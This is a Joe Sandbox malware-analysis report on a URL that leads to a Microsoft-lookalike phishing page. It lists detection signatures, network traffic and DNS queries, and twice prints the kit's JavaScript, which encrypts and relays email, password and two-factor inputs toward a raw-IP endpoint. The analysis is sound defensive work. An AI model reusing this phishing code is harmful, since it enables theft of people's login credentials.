Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4

Overview

General Information

Sample URL:https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4
Analysis ID:1466175

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
Phishing site detected (based on image similarity)
Phishing site detected (based on shot match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1952,i,15982323657434710459,10639272288985908440,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
SourceRuleDescriptionAuthorStrings
3.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    3.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      3.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        3.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          Phishing

          barindex
          Source: https://lathern.manfross.netLLM: Score: 9 brands: Microsoft Reasons: The URL 'https://lathern.manfross.net' does not match the legitimate domain name 'microsoft.com' associated with the brand Microsoft. The webpage closely resembles the legitimate Microsoft login page, which is a common social engineering technique used in phishing attacks. The presence of a prominent login form without a CAPTCHA further adds to the suspicion. Given these factors, it is highly likely that this is a phishing site. DOM: 3.6.pages.csv
          Source: Yara matchFile source: 3.7.pages.csv, type: HTML
          Source: Yara matchFile source: 3.6.pages.csv, type: HTML
          Source: Yara matchFile source: 3.6.pages.csv, type: HTML
          Source: Yara matchFile source: 3.7.pages.csv, type: HTML
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgMatcher: Found strong image similarity, brand: MICROSOFT
          Source: https://lathern.manfross.net/rFfYEQ/Matcher: Template: captcha matched
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/i4p05/0x4AAAAAAAdpZlKc4sQ-fsbY/auto/normalMatcher: Template: captcha matched
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/i4p05/0x4AAAAAAAdpZlKc4sQ-fsbY/auto/normalMatcher: Template: captcha matched
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "HLMUxt";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "sqk3v2V9NZlRXjDVZRanTPGbZelqGP2JtvozdAbb4FwWlPtecgQ1w";var gdf = "ijGG6pjSHgyTSRoWhvuowxUecTLynFNPllMaPjab120";var odf = "ij7cbmXXqdHsR0AkVg4uvZgnwsbfjR0SWBab647";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET', $.ajax({
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "HLMUxt";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "sqk3v2V9NZlRXjDVZRanTPGbZelqGP2JtvozdAbb4FwWlPtecgQ1w";var gdf = "ijGG6pjSHgyTSRoWhvuowxUecTLynFNPllMaPjab120";var odf = "ij7cbmXXqdHsR0AkVg4uvZgnwsbfjR0SWBab647";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET', $.ajax({
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: Number of links: 0
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://lathern.manfross.net/rFfYEQ/HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head><!-- Action is the foundational key to all success. --> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=expli...
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: Title: Equity Valuation does not match URL
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: Invalid link: Terms of use
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: Invalid link: Privacy & cookies
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: Invalid link: Terms of use
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: Invalid link: Privacy & cookies
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: <input type="password" .../> found
          Source: https://lathern.manfross.net/rFfYEQ/HTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/i4p05/0x4AAAAAAAdpZlKc4sQ-fsbY/auto/normalHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/i4p05/0x4AAAAAAAdpZlKc4sQ-fsbY/auto/normalHTTP Parser: No favicon
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: No favicon
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: No favicon
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: No <meta name="author".. found
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: No <meta name="author".. found
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: No <meta name="copyright".. found
          Source: https://lathern.manfross.net/945934357436843pkdaiukzevckhpaoqxv?eibzlcepoftvuvjkaijdpteepjrbgxrqgHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.18:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.18:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 2.23.209.185:443 -> 192.168.2.18:49776 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.18:49850 version: TLS 1.2
          Source: chrome.exeMemory has grown: Private usage: 14MB later: 34MB
          Source: global trafficTCP traffic: 192.168.2.18:56550 -> 1.1.1.1:53
          Source: global trafficTCP traffic: 192.168.2.18:56550 -> 1.1.1.1:53
          Source: global trafficTCP traffic: 192.168.2.18:56550 -> 1.1.1.1:53
          Source: global trafficTCP traffic: 192.168.2.18:56550 -> 1.1.1.1:53
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.69
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.185
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.185
          Source: unknownTCP traffic detected without corresponding DNS query: 2.23.209.185
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: beta.slimwiki.com
          Source: global trafficDNS traffic detected: DNS query: o432630.ingest.sentry.io
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: api.beta.slimwiki.com
          Source: global trafficDNS traffic detected: DNS query: d3blkimb060pwm.cloudfront.net
          Source: global trafficDNS traffic detected: DNS query: lathern.manfross.net
          Source: global trafficDNS traffic detected: DNS query: qqe.p9j32.com
          Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: cdn.socket.io
          Source: global trafficDNS traffic detected: DNS query: github.com
          Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
          Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
